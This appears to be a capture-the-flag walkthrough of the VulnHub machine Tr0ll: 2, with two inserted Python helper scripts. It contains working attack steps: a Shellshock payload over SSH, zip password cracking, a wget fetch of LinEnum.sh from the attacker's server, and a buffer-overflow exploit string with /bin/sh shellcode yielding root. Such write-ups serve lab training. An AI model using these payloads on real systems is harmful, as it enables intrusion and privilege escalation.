VulnHub: Tr0ll: 2

ratiros01
8 min read, Apr 22, 2021

Initial Foothold

  1. Network discovery

nmap -sn 10.0.2.27/24

My target is 10.0.2.30.

2. Port scan

nmap -Pn 10.0.2.30
nmap -Pn -p1000- 10.0.2.30

3. OS and service scan

nmap -A -p21,22,80 10.0.2.30

There’re 3 services: ftp, ssh, and http.

4. Vuln scan

nmap --script vuln -p21,22,80 10.0.2.30

There’s a ‘robots.txt’ file.

Service Enumeration

There’re 3 TCP services:

  • 21/tcp ftp vsftpd 2.0.8 or later

Connect

ftp 10.0.2.30

There’s a banner.

  • 22/tcp ssh OpenSSH 5.9p1 Debian 5ubuntu1.4

Connect

ssh 10.0.2.30

  • 80/tcp http Apache httpd 2.2.22 ((Ubuntu))

  1. Nikto scan

nikto -h http://10.0.2.30

2. Directory scan

gobuster dir --wordlist /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://10.0.2.30/ -x php,txt,html,sh,cgi -q

3. Access the site

View page source. There’s a possible username: Tr0ll.

Save it as ‘user.txt’ in case I need to use it.

Access robots.txt

Copy only the directory list and save it as ‘robots_fix.txt’.

4. Enumerate the site’s directories w/ robots_fix.txt

gobuster dir --wordlist http/robots_fix.txt -u http://10.0.2.30/ -x php,txt,html,sh,cgi -q

There are only 4 directories that I can access. Others are trolls.

I started w/ ‘ok_this_is_it’. There’s a page w/ one image.

View page source

Save the image and analyze its metadata

exiftool cat_the_troll.jpg

The file size is 15 KiB.

Search for any hidden messages.

strings cat_the_troll.jpg

I repeated these steps for every path until I reached /dont_bother/.

I noticed that its image file size is 16 KiB, which differs from the others.

Use ‘strings’ to search for a hidden message, and there it is.

6. Access ‘y0ur_self’

There’s an ‘answer.txt’ file.

Read it. It contains base64-encoded strings, and some of them are duplicates.

Download it.

wget http://10.0.2.30/y0ur_self/answer.txt

Remove the duplicate strings.

sort answer.txt | uniq > new_answer.txt
cat new_answer.txt

Now it is better.

Decode it w/ CyberChef. It can import files, so it is super convenient. After decoding, I saved the result as ‘decoded_answer.txt’.

Read the file

cat decoded_answer.txt

It’s a password for something.
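As an added example (not part of the original walkthrough), the following Python script does the sort/uniq and base64 steps in one pass and also reports any line that is not valid base64, which the shell pipeline above does not check for. The sample input is constructed here and is not the challenge's real answer.txt.

```python
import base64
import binascii

# Constructed sample in the shape of the challenge's answer.txt (not the real file):
# base64 lines, some repeated, and one line that is not valid base64 at all.
SAMPLE_ANSWER_TXT = """\
aGVsbG8=
d29ybGQ=
aGVsbG8=
not*base64
cGFzc3dvcmQ=
d29ybGQ=
"""


def decode_unique_lines(text):
    """Decode every distinct base64 line of `text`, keeping first-seen order.

    Returns (decoded, rejected): decoded holds the plaintext candidates,
    rejected holds lines that were not valid base64 (strict alphabet check)
    or did not decode to UTF-8, so they can be inspected instead of silently
    dropped.
    """
    seen = set()
    decoded = []
    rejected = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line in seen:  # skip blanks and duplicates
            continue
        seen.add(line)
        try:
            value = base64.b64decode(line, validate=True).decode("utf-8")
        except (binascii.Error, UnicodeDecodeError):
            rejected.append(line)
            continue
        decoded.append(value)
    return decoded, rejected


def write_wordlist(text, path):
    """Write the decoded candidates one per line (the decoded_answer.txt step)."""
    values, _ = decode_unique_lines(text)
    with open(path, "w", encoding="utf-8") as fh:
        fh.write("\n".join(values) + "\n")
    return len(values)


if __name__ == "__main__":
    values, bad = decode_unique_lines(SAMPLE_ANSWER_TXT)
    print("\n".join(values))
    if bad:
        print("rejected (not base64):", bad)
```

Pointing `decode_unique_lines` at the contents of a downloaded answer.txt yields the same candidate list as the sort/uniq/CyberChef route, with the bonus that trolled or corrupted lines show up in the rejected list rather than as garbage in the wordlist.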

Find access to the machine

I don't have a shell yet. There are 2 services that need credentials: FTP and SSH.

So far I have one username: Tr0ll and a list of passwords.

  1. Starting w/ FTP, connect to the service again.

Sometimes an FTP user doesn't require a password.

ftp 10.0.2.30
username: Tr0ll
password: (empty)

Failed.

Use the same string as both username and password. This time I succeeded.

username: Tr0ll
password: Tr0ll
ls -la

There’s ‘lmao.zip’.

Download it

get lmao.zip

Unzip it.

unzip lmao.zip

It requires a password.

Crack it w/ fcrackzip. I already have a password list I can use for the attack.

fcrackzip -u -v -D -p http/y0ur_self/decoded_answer.txt lmao.zip

Now I got the password.

unzip lmao.zip
password: <cracked password>
ls

I got the new file, ‘noob’.

Read it

cat noob

It’s a private key for SSH service.

2. Login to SSH service

Change noob's permissions

chmod 600 noob

Starting w/ ‘Tr0ll’

ssh -i noob Tr0ll@10.0.2.30

It still requires a password.

I guess the username may be ‘noob’. Let’s change the username to ‘noob’.

ssh -i noob noob@10.0.2.30

The connection was closed immediately after logging in.

Try the Shellshock technique w/ SSH

ssh -i noob noob@10.0.2.30 '() { :;}; /bin/bash'
id
python -c 'import pty;pty.spawn("/bin/bash");'

Now I have a shell, and I need a TTY shell to work around the machine.

Privilege Escalation

  1. Explore the directories as listed:

/home
/tmp
/opt
/var
/var/www/html

I didn't find anything in these directories.

2. Verify sudo permissions

sudo -l

I need a password.

3. LinEnum.sh

Prepare an HTTP server on the attacker machine

python -m SimpleHTTPServer 80

Download it

cd /tmp
wget http://10.0.2.27/LinEnum.sh
chmod 777 LinEnum.sh

Run it

./LinEnum.sh

Reading from the bottom to the top, here are the things I found interesting.

noob’s ‘.bash_history’. Maybe a hint about a buffer overflow (BOF).

SUID files. The last 3 records are the leads.

Access it

cd /nothing_to_see_here/choose_wisely
ls -la

There’re 3 directories.

door1

cd door1
ls -la

There’s r00t.

door2

cd ../door2
ls -la

There’s r00t.

door3

cd ../door3
ls -la

There’s r00t.

Try running it

./r00t

My connection is closed after a few seconds. I have to repeat the connection step.

Let’s try door2

./r00t

I have to supply an input.

./r00t test

Maybe I can do a buffer overflow.

Buffer Overflow

  1. Fuzzing

./r00t $(python -c 'print "A"*500' )

There’s a segmentation fault. I can proceed to the next step.

2. Find EIP offset

Create a pattern of 500 characters

msf-pattern_create -l 500

Open r00t w/ gdb

gdb ./r00t

Supply the created pattern

r <created pattern>

EIP address is 0x6a413969

Find the offset

msf-pattern_offset -l 500 -q <EIP address>

in my case:

msf-pattern_offset -l 500 -q 6a413969

EIP offset is 268.
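To make the offset step less of a black box, here is an added Python reimplementation (mine, not the Metasploit tools' own code) of what msf-pattern_create and msf-pattern_offset compute. The pattern is built from unique upper/lower/digit triples, and the lookup reverses the bytes of the crashed EIP value because x86 is little-endian; running it with the value from above reproduces the offset 268.

```python
import string
import struct

PATTERN_ALPHABETS = (string.ascii_uppercase, string.ascii_lowercase, string.digits)


def pattern_create(length):
    """Build a cyclic pattern of `length` bytes in the Metasploit layout.

    Each 3-byte triple is upper+lower+digit, enumerated in that order, so
    every 3-byte window is unique for the first 26*26*10*3 = 20280 bytes.
    """
    triples = []
    for upper in PATTERN_ALPHABETS[0]:
        for lower in PATTERN_ALPHABETS[1]:
            for digit in PATTERN_ALPHABETS[2]:
                triples.append(upper + lower + digit)
                if len(triples) * 3 >= length:
                    return "".join(triples)[:length]
    return "".join(triples)[:length]


def pattern_offset(length, eip_hex):
    """Map a crashed EIP value (hex string as gdb prints it, e.g. '6a413969')
    to its offset in the pattern of the given length, or -1 if absent.

    The register holds the four overwriting bytes in little-endian order, so
    the bytes are packed with '<I' before searching; a big-endian search is
    tried as a fallback, as msf-pattern_offset also does.
    """
    value = int(eip_hex, 16)
    haystack = pattern_create(length)
    for order in ("<", ">"):
        needle = struct.pack(order + "I", value).decode("latin-1")
        idx = haystack.find(needle)
        if idx != -1:
            return idx
    return -1


if __name__ == "__main__":
    # The crash value recorded in this walkthrough, with a 500-byte pattern.
    print(pattern_offset(500, "6a413969"))
```

The four bytes that land in EIP are a 4-byte window of the pattern, so `pattern_offset` only needs `str.find`; the uniqueness of 3-byte windows guarantees the first match is the right one for any pattern shorter than 20280 bytes.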

3. Find ESP address

Back to the gdb

i r esp

The ESP address is ‘0xbffffac0’.

4. Overwrite EIP and confirm the offset

Quit the gdb and restart the program

quit
./r00t

After quitting, r00t has disappeared.

List the file.

ls -la

Nothing.

Try to run r00t in door3

./r00t

Back to door2

ls -la

Permission denied

Now I think that this machine has a hidden script that trolls me to make it harder: it closes the connection and makes the file disappear from the listing.

I can use another command to verify this directory

stat r00t

Now I see the same file again.

Open w/ gdb

gdb ./r00t

Confirm the offset

r $(python -c 'print "A"*<offset number> + "B"*4' )

in my case:

r $(python -c 'print "A"*268 + "B"*4' )

Now I got 0x42424242 (“B”*4), which means the offset is correct.

5. Exploitation

I got the /bin/sh shellcode from here:

./r00t $(python -c 'print "A"*<offset number> + "<ESP address>" + "\x90" * 10 + "<shellcode>"')

in my case:

./r00t $(python -c 'print "A"*268 + "\xc0\xfa\xff\xbf" + "\x90" * 10 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\x6a\x0b\x58\xcd\x80"')

NOTE: “\x90” * 10 is a NOP sled.

id
whoami

Now, I’m root.

cd /root
ls -la
cat Proof.txt
